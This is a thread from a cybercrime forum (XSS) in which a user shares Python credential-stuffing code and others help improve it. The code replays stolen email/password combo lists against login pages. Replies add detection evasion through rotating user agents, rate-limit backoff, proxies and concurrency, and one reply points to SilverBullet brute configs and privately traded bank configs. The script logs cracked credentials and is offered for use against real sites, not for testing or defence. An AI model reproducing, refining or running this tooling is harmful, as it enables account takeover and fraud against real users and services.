• XSS.stack #1 – первый литературный журнал от юзеров форума

brute force tool

honeybunz

RAID-массив
Пользователь
Регистрация
18.02.2023
Сообщения
51
Реакции
9
hello all i recently started a brute force tool and was seeking the guidence of a more experienced coder to mention any improvemnts, this is just the start and i am going to be constantly trying to improve the tool.


import us
import argparse
import configparser
import requests
import time
import sqlite3

# User-Agent and Headers
DEFAULT_HEADERS = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Accept-Language": "en-US,en;q=0.9",
# Add any other necessary headers
}

# Session Management
session = requests.Session()


def connect_to_database(database_file):
"""Connect to SQLite database and return the connection and cursor objects."""
conn = sqlite3.connect(database_file)
cursor = conn.cursor()
return conn, cursor


def retrieve_credentials(cursor):
"""Retrieve usernames and passwords from the database and return as a list of tuples."""
cursor.execute("SELECT email, password FROM email_combo")
return cursor.fetchall()


def login_attempt(target_url, username, password, headers):
"""Send a login request and return the response."""
login_data = {"username": username, "password": password}
response = session.post(target_url, data=login_data, headers=headers)
return response


def handle_login_response(response, username, password):
"""Handle the login response and print appropriate messages."""
if "Login Successful" in response.text:
print(f"Successful login! Username: {username}, Password: {password}")
return True
else:
print(f"Failed login attempt. Username: {username}, Password: {password}")
return False


def close_database_connection(conn):
"""Close the database connection."""
conn.close()


def perform_login_brute_force(
target_url, database_file, delay_between_attempts, headers
):
"""Perform login brute force using credentials from the database."""
conn, cursor = connect_to_database(database_file)
credentials = retrieve_credentials(cursor)

num_attempts = 0
num_successful = 0

for username, password in credentials:
try:
# Throttling and Rate Limiting
time.sleep(delay_between_attempts)

# Send the login request
response = login_attempt(target_url, username, password, headers)

# Handling HTTP Errors
response.raise_for_status()

num_attempts += 1

# Check the response to determine if login was successful
if handle_login_response(response, username, password):
num_successful += 1
break
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
# Implement appropriate retry or error handling logic here

close_database_connection(conn)

# Display progress and results summary
print("Login brute force completed.")
print(f"Total attempts: {num_attempts}")
print(f"Successful logins: {num_successful}")
print(f"Remaining attempts: {len(credentials) - num_attempts}")


def read_config_file(config_file):
"""Read configuration from file and return a configparser.ConfigParser object."""
config = configparser.ConfigParser()
config.read(config_file)
return config


def prompt_target_url(target_urls):
"""Prompt the user to choose a target URL."""
print("Do you want to use your own target URL or choose from the list?")
print("1. Use my own target URL")
print("2. Choose from the list")

choice = input("Enter the corresponding number: ").strip()
if choice == "1":
target_url = input("Enter your target URL: ").strip()
return target_url
elif choice == "2":
print("Select a target URL:")
for i, url in enumerate(target_urls):
print(f"{i + 1}. {url}")
choice = input("Enter the corresponding number: ").strip()
if choice:
index = int(choice) - 1
if 0 <= index < len(target_urls):
return target_urls[index]
return None


def parse_arguments():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser(description="Brute-force login tool.")
return parser.parse_args()


def main():
try:
# Parse command-line arguments
args = parse_arguments()

# Determine the configuration file path
script_dir = os.path.dirname(os.path.abspath(__file__))
config_file = os.path.join(script_dir, "config.ini")

# Read configuration from the file
config = read_config_file(config_file)

# Retrieve target URLs from the configuration
target_urls = []
if config.has_section("targets"):
target_urls = [value for key, value in config.items("targets")]

# Prompt the user to choose a target URL or use their own
target_url = prompt_target_url(target_urls)
if target_url is None:
target_urls = (
[]
) # Clear the target_urls list if the user chooses to use their own URL
elif target_url not in target_urls:
target_urls.append(target_url)

# Retrieve other values from the configuration
database_file = config.get("database", "file")
delay_between_attempts = config.getfloat("options", "delay")

headers = dict(DEFAULT_HEADERS)
if config.has_section("headers"):
for key, value in config.items("headers"):
headers[key.strip()] = value.strip()

# Perform login brute force for each target URL
for url in target_urls:
perform_login_brute_force(
url, database_file, delay_between_attempts, headers
)

except (configparser.Error, ValueError) as e:
print(f"Error reading configuration: {str(e)}")

except KeyboardInterrupt:
print("\nUser interrupted the execution.")

except Exception as e:
print(f"An error occurred: {str(e)}")


if __name__ == "__main__":
main()
 
Well the obvious improvement would be to go async (asyncio, aiohttp, aiosqlite), and add the prompt or command-line argument to choose the timeout between login attempts, as some website literally do not care how many requests you do, and some lock you after too many requests in some time window. I haven't got much time right now to read all the code, gonna post some more suggestions a bit later.
 
Well, I didnt wrote a brute tool before in the meaning of the word itself, some sprayers yet, but, as my 2 cents to your code, I would add the following (pseudo code itself, not extrictly python or your specific code):

- Rate limit: Most important thing is to not trigger the bans by rate limit. so try add a delay (dynamic), between calls/attemps depending on the server response:
Код:
if response.status_code == 429: print("Rate limit exceeded, increasing delay...") delay_between_attempts *= 2

- Would be nice to have a function to try differents user-agents, sometimes works, sometimes not:
Код:
user_agents = config.get("options", "user_agents").split(",") user_agent = user_agents[num_attempts % len(user_agents)] headers["User-Agent"] = user_agent

- This means that you will need a config file or something like .env or whatever tto read and validate your shit:
Код:
if not config.has_option("database", "file"): raise ValueError("Missing required configuration value: database.file")

- Progress: Could be good to see how your baby is going, how many attemps, how creds left... etc:
Код:
print(f"Attempt {num_attempts} of {len(credentials)}, success rate: {num_successful/num_attempts:.2%}")

- As J3S00S told you before, concurrency, you know, threads, asyncio, those things (care with the rate limit again):
Код:
with concurrent.futures.ThreadPoolExecutor() as executor: future_to_attempt = {executor.submit(login_attempt, target_url, username, password, headers): (username, password) for username, password in credentials}

- Improve error handling, its not bad but you will need to be more specific, specially with things fails, like you need to know if its because rate limit, do X, if its user-agent, do Y, etc.

- About different connections (this could be related to rate limit, but well, you know, I have not much time to format this post correctly. Idea here is have a list of proxies or things like that as your "backup" when you trigger rate limit or need more concurrency, again, from config files.

Hope this helps mate! Keep c0ding!!
 
Well the obvious improvement would be to go async (asyncio, aiohttp, aiosqlite), and add the prompt or command-line argument to choose the timeout between login attempts, as some website literally do not care how many requests you do, and some lock you after too many requests in some time window. I haven't got much time right now to read all the code, gonna post some more suggestions a bit later.
Well, I didnt wrote a brute tool before in the meaning of the word itself, some sprayers yet, but, as my 2 cents to your code, I would add the following (pseudo code itself, not extrictly python or your specific code):

- Rate limit: Most important thing is to not trigger the bans by rate limit. so try add a delay (dynamic), between calls/attemps depending on the server response:
Код:
if response.status_code == 429: print("Rate limit exceeded, increasing delay...") delay_between_attempts *= 2

- Would be nice to have a function to try differents user-agents, sometimes works, sometimes not:
Код:
user_agents = config.get("options", "user_agents").split(",") user_agent = user_agents[num_attempts % len(user_agents)] headers["User-Agent"] = user_agent

- This means that you will need a config file or something like .env or whatever tto read and validate your shit:
Код:
if not config.has_option("database", "file"): raise ValueError("Missing required configuration value: database.file")

- Progress: Could be good to see how your baby is going, how many attemps, how creds left... etc:
Код:
print(f"Attempt {num_attempts} of {len(credentials)}, success rate: {num_successful/num_attempts:.2%}")

- As J3S00S told you before, concurrency, you know, threads, asyncio, those things (care with the rate limit again):
Код:
with concurrent.futures.ThreadPoolExecutor() as executor: future_to_attempt = {executor.submit(login_attempt, target_url, username, password, headers): (username, password) for username, password in credentials}

- Improve error handling, its not bad but you will need to be more specific, specially with things fails, like you need to know if its because rate limit, do X, if its user-agent, do Y, etc.

- About different connections (this could be related to rate limit, but well, you know, I have not much time to format this post correctly. Idea here is have a list of proxies or things like that as your "backup" when you trigger rate limit or need more concurrency, again, from config files.

Hope this helps mate! Keep c0ding!!
thanks for the help so far. took your advice into consideration and made a few errors this is the current script as of now. :)
Python:
[/
import re
import us
import time
import random
import sqlite3
import logging
import argparse
import requests
import configparser
import asyncio
import aiohttp
import aiosqlite
from zxcvbn import zxcvbn
from alive_progress import alive_bar


# User-Agent and Headers
DEFAULT_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Accept-Language": "en-US,en;q=0.9",
    # Add any other necessary headers
}

# Logging Configuration
logging.basicConfig(
    level=logging.INFO, format="[%(asctime)s] [%(levelname)s] %(message)s"
)
logger = logging.getLogger(__name__)
logger.addHandler(logging.FileHandler("brute_force.log"))


async def connect_to_database(database_file):
    """Connect to SQLite database and return the connection and cursor objects."""
    try:
        conn = await aiosqlite.connect(database_file)
        cursor = await conn.cursor()
        return conn, cursor
    except sqlite3.Error as e:
        logger.error(f"Failed to connect to the database: {str(e)}")
        raise


async def retrieve_credentials(cursor):
    """Retrieve usernames and passwords from the database and return as a list of tuples."""
    try:
        await cursor.execute("SELECT email, password FROM email_combo")
        return await cursor.fetchall()
    except sqlite3.Error as e:
        logger.error(f"Failed to retrieve credentials from the database: {str(e)}")
        raise


async def login_attempt(target_url, username, password, headers):
    """Send a login request and return the response."""
    login_data = {"username": username, "password": password}
    try:
        async with aiohttp.ClientSession(headers=headers) as session:
            async with session.post(target_url, data=login_data) as response:
                response.raise_for_status()
                return await response.text()
    except aiohttp.ClientError as e:
        logger.error(f"An error occurred while sending the login request: {str(e)}")
        raise


def handle_login_response(response, username, password):
    """Handle the login response and print appropriate messages."""
    if "Login Successful" in response:
        logger.info(f"Successful login! Username: {username}, Password: {password}")
        return True
    else:
        logger.info(f"Failed login attempt. Username: {username}, Password: {password}")
        return False


async def close_database_connection(conn):
    """Close the database connection."""
    try:
        await conn.close()
    except sqlite3.Error as e:
        logger.error(f"Failed to close the database connection: {str(e)}")


def generate_report(credentials, successful_logins):
    """Generate a detailed report after the brute-force attack completes."""
    total_attempts = len(credentials)
    failed_attempts = total_attempts - successful_logins
    success_rate = (successful_logins / total_attempts) * 100

    # Generate password strength analysis
    password_analysis = []
    for username, password in credentials:
        result = zxcvbn(password)
        score = result["score"]
        password_analysis.append((username, password, score))

    # Generate and save the report
    report = f"Brute-force attack report:\n\n"
    report += f"Total attempts: {total_attempts}\n"
    report += f"Successful logins: {successful_logins}\n"
    report += f"Failed attempts: {failed_attempts}\n"
    report += f"Success rate: {success_rate:.2f}%\n\n"
    report += f"Password strength analysis:\n"
    for username, password, score in password_analysis:
        report += f"Username: {username}, Password: {password}, Strength: {score}/4\n"

    # Save the report to a file
    report_filename = "brute_force_report.txt"
    with open(report_filename, "w") as report_file:
        report_file.write(report)

    logger.info(f"Report generated and saved as {report_filename}")


async def perform_login(target_url, username, password, headers):
    """Perform a single login attempt and handle the response."""
    try:
        response = await login_attempt(target_url, username, password, headers)
        return handle_login_response(response, username, password)
    except (aiohttp.ClientError, sqlite3.Error) as e:
        logger.error(f"An error occurred during login attempt: {str(e)}")
    return False


def check_password_strength(password):
    """Check the strength of a password using zxcvbn."""
    result = zxcvbn(password)
    score = result["score"]

    print(f"Password strength: {score}/4")


async def perform_login_brute_force(
    target_url,
    database_file,
    delay_between_attempts,
    headers,
    max_workers,
    min_delay,
    max_delay,
    max_errors,
    user_agents,
):
    """Perform login brute force using credentials from the database."""
    try:
        conn, cursor = await connect_to_database(database_file)
        credentials = await retrieve_credentials(cursor)

        num_attempts = 0
        num_successful = 0
        consecutive_errors = 0

        async with alive_bar(
            len(credentials), title="Brute-force Progress"
        ) as bar:
            tasks = []
            semaphore = asyncio.Semaphore(max_workers)

            for username, password in credentials:
                # Throttling and Rate Limiting
                await asyncio.sleep(delay_between_attempts)
                delay = random.uniform(min_delay, max_delay)
                await asyncio.sleep(delay)

                check_password_strength(password)

                rotate_user_agent(headers, num_attempts, user_agents)

                async with semaphore:
                    task = asyncio.create_task(
                        perform_login(target_url, username, password, headers)
                    )
                    tasks.append(task)

                num_attempts += 1
                update_progress(num_attempts, num_successful, len(credentials))
                bar()
                logger.info(f"Remaining attempts: {len(credentials) - num_attempts}")

            await asyncio.gather(*tasks)

        await close_database_connection(conn)

        # Generate and save the report
        generate_report(credentials, num_successful)

        # Display progress and results summary
        logger.info("Login brute force completed.")
        logger.info(f"Total attempts: {num_attempts}")
        logger.info(f"Successful logins: {num_successful}")
        logger.info(f"Remaining attempts: {len(credentials) - num_attempts}")

    except Exception as e:
        handle_error(e)


# Rate limit
def handle_rate_limit(response, delay_between_attempts):
    """Handle rate limit by increasing the delay between attempts."""
    if response.status_code == 429:
        logger.warning("Rate limit exceeded. Increasing delay...")
        delay_between_attempts *= 2
    return delay_between_attempts


# User-Agent rotation
def rotate_user_agent(headers, num_attempts, user_agents):
    """Rotate the User-Agent header to try different user agents."""
    user_agent = user_agents[num_attempts % len(user_agents)]
    headers["User-Agent"] = user_agent


def read_config_file(config_file):
    """Read configuration from file and return a configparser.ConfigParser object."""
    config = configparser.ConfigParser()
    try:
        config.read(config_file)
        return config
    except configparser.Error as e:
        logger.error(f"Error reading configuration file: {str(e)}")
        raise


def prompt_target_url(target_urls):
    """Prompt the user to choose a target URL."""
    print("Do you want to use your own target URL or choose from the list?")
    print("1. Use my own target URL")
    print("2. Choose from the list")

    choice = input("Enter the corresponding number: ").strip()
    if choice == "1":
        target_url = input("Enter your target URL: ").strip()
        return target_url
    elif choice == "2":
        print("Select a target URL:")
        for i, url in enumerate(target_urls):
            print(f"{i + 1}. {url}")
        choice = input("Enter the corresponding number: ").strip()
        if choice:
            index = int(choice) - 1
            if 0 <= index < len(target_urls):
                return target_urls[index]
    return None

def handle_error(error):
    """Handle and log any errors that occur during the script execution."""
    logger.error(f"An error occurred: {str(error)}")


def validate_target_url(target_url):
    """Validate the format of the target URL."""
    # Perform your validation logic here
    # Example: Check if the target URL is a valid URL
    ...


async def main():
    parser = argparse.ArgumentParser(description="Login Brute Force Script")
    parser.add_argument(
        "-c",
        "--config-file",
        help="Configuration file containing additional settings",
    )
    args = parser.parse_args()

    # Read configuration file if provided or use config.ini if not provided
    config_file = args.config_file or "config.ini"
    config = read_config_file(config_file)

    # Get target URL from config or user input
    target_urls = config.get("GENERAL", "target_urls", fallback="").split(",")
    target_url = None
    if target_urls:
        target_url = prompt_target_url(target_urls)

    if not target_url:
        logger.error("Invalid target URL. Exiting...")
        return

    # Set up parameters from configuration file
    database_file = config.get("GENERAL", "database_file", fallback="")
    delay_between_attempts = config.getfloat("GENERAL", "delay_between_attempts", fallback=0)
    headers = dict(DEFAULT_HEADERS, **dict(config.items("headers"))) if config else DEFAULT_HEADERS
    max_workers = config.getint("GENERAL", "max_workers", fallback=10)
    min_delay = config.getfloat("GENERAL", "min_delay", fallback=0)
    max_delay = config.getfloat("GENERAL", "max_delay", fallback=1)
    max_errors = config.getint("GENERAL", "max_errors", fallback=5)
    user_agents = config.get("GENERAL", "user_agents", fallback="").split(",") if config else []

    # Validate the target URL
    validate_target_url(target_url)

    # Perform login brute force
    await perform_login_brute_force(
        target_url,
        database_file,
        delay_between_attempts,
        headers,
        max_workers,
        min_delay,
        max_delay,
        max_errors,
        user_agents,
    )



if __name__ == "__main__":
    asyncio.run(main())
]
 
Python:
import os
import sys
import argparse
import configparser
import requests
import time
import sqlite3

# User-Agent and Headers
DEFAULT_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Accept-Language": "en-US,en;q=0.9",
    # Add any other necessary headers
}

# Session Management
session = requests.Session()


def connect_to_database(database_file):
    """Connect to SQLite database and return the connection and cursor objects."""
    conn = sqlite3.connect(database_file)
    cursor = conn.cursor()
    return conn, cursor


def retrieve_credentials(cursor):
    """Retrieve usernames and passwords from the database and return as a list of tuples."""
    cursor.execute("SELECT email, password FROM email_combo")
    return cursor.fetchall()


def login_attempt(target_url, username, password, headers):
    """Send a login request and return the response."""
    login_data = {"username": username, "password": password}
    response = session.post(target_url, data=login_data, headers=headers)
    return response


def handle_login_response(response, username, password):
    """Handle the login response and print appropriate messages."""
    if "Login Successful" in response.text:
        print(f"Successful login! Username: {username}, Password: {password}")
        return True
    else:
        print(f"Failed login attempt. Username: {username}, Password: {password}")
        return False


def close_database_connection(conn):
    """Close the database connection."""
    conn.close()


def perform_login_brute_force(target_url, database_file, delay_between_attempts, headers):
    """Perform login brute force using credentials from the database."""
    conn, cursor = connect_to_database(database_file)
    credentials = retrieve_credentials(cursor)

    num_attempts = 0
    num_successful = 0

    for username, password in credentials:
        try:
            # Throttling and Rate Limiting
            time.sleep(delay_between_attempts)

            # Send the login request
            response = login_attempt(target_url, username, password, headers)

            # Handling HTTP Errors
            response.raise_for_status()

            num_attempts += 1

            # Check the response to determine if login was successful
            if handle_login_response(response, username, password):
                num_successful += 1
                break
        except requests.exceptions.RequestException as e:
            print(f"An error occurred: {e}")
            # Implement appropriate retry or error handling logic here

    close_database_connection(conn)

    # Display progress and results summary
    print("Login brute force completed.")
    print(f"Total attempts: {num_attempts}")
    print(f"Successful logins: {num_successful}")
    print(f"Remaining attempts: {len(credentials) - num_attempts}")


def read_config_file(config_file):
    """Read configuration from file and return a configparser.ConfigParser object."""
    config = configparser.ConfigParser()
    config.read(config_file)
    return config


def prompt_target_url(target_urls):
    """Prompt the user to choose a target URL."""
    print("Do you want to use your own target URL or choose from the list?")
    print("1. Use my own target URL")
    print("2. Choose from the list")

    choice = input("Enter the corresponding number: ").strip()
    if choice== "1":
        target_url = input("Enter your target URL: ").strip()
        return target_url
    elif choice == "2":
        print("Select a target URL:")
        for i, url in enumerate(target_urls):
            print(f"{i + 1}. {url}")
        choice = input("Enter the corresponding number: ").strip()
        if choice:
            index = int(choice) - 1
            if 0 <= index < len(target_urls):
                return target_urls[index]
    return None


def parse_arguments():
    """Parse command-line arguments."""
    parser = argparse.ArgumentParser(description="Brute-force login tool.")
    return parser.parse_args()


def main():
    try:
        # Parse command-line arguments
        args = parse_arguments()

        # Determine the configuration file path
        script_dir = os.path.dirname(os.path.abspath(__file__))
        config_file = os.path.join(script_dir, "config.ini")

        # Read configuration from the file
        config = read_config_file(config_file)

        # Retrieve target URLs from the configuration
        target_urls = []
        if config.has_section("targets"):
            target_urls = [value for key, value in config.items("targets")]

        # Prompt the user to choose a target URL or use their own
        target_url = prompt_target_url(target_urls)
        if target_url is None:
            target_urls = []  # Clear the target_urls list if the user chooses to use their own URL
        elif target_url not in target_urls:
            target_urls.append(target_url)

        # Retrieve other values from the configuration
        database_file = config.get("database", "file")
        delay_between_attempts = config.getfloat("options", "delay")

        headers = dict(DEFAULT_HEADERS)
        if config.has_section("headers"):
            for key, value in config.items("headers"):
                headers[key.strip()] = value.strip()

        # Perform login brute force for each target URL
        for url in target_urls:
            perform_login_brute_force(url, database_file, delay_between_attempts, headers)

    except (configparser.Error, ValueError) as e:
        print(f"Error reading configuration: {str(e)}")

    except KeyboardInterrupt:
        print("\nUser interrupted the execution.")

    except Exception as e:
        print(f"An error occurred: {str(e)}")


if __name__ == "__main__":
    main()
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Use Silverbullet or privatekeeper frameworks to build your brute configs. Anything you code from scratch will be inferior compared to those frameworks

The free version is fine



If you are wanting to just do it for the sake of picking up some practical python then still use silverbullet because you have option to switch between ide like env that accepts raw python or using the intuitive blocks. If you like a brute config you make then silverbullet has the built in option to create a standalone exe out of it for you also ( although there are better methods for this ) Want to add rotating proxies to your brute or captcha solver/bypass? 1 click. Inline debugger, yep. Step by step walk through with log viewer, built in browser render, and server req response tabs. Plus just a ton more, its all in one

As someone with extensive experience writing brute applications, configs, plugins and involved in all bruting communities across any language for the past decade I 100% recommend starting with and becoming familiar with all the features of silverbullet before anything else. You can create very advanced brutes with svb once you get a hang of eveything. You will experience success more than failure to prevent burnout and its valuable period. There arent many standard to moderate security auth portals i cant whip up a working config for within 10 minutes tops which i find myself doing multiple times a day related to parts of projects and I always use silverbullet first


If you want to check some available valid configs created by others then check https://cracked[.]io/Forum-Cracking-Configs thats a school children forum filled with annoying children but they happen to be very active and quite decent with brute configs lol. I see a lot of brute specific things like akami bypass and such listed fastest and realesed the soonest usually there. Most of the configs released openly you see are somewhat innocent. For black stuff its all through DMs only ( banks etc ). Everyones rep is public and it becomes quite clear who you want to see if you have certain interests. I hate how they all use discord though =(


Do what you want with this advice but this is coming from someone who is in this field daily as a secondary attached to many of my projects and work
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх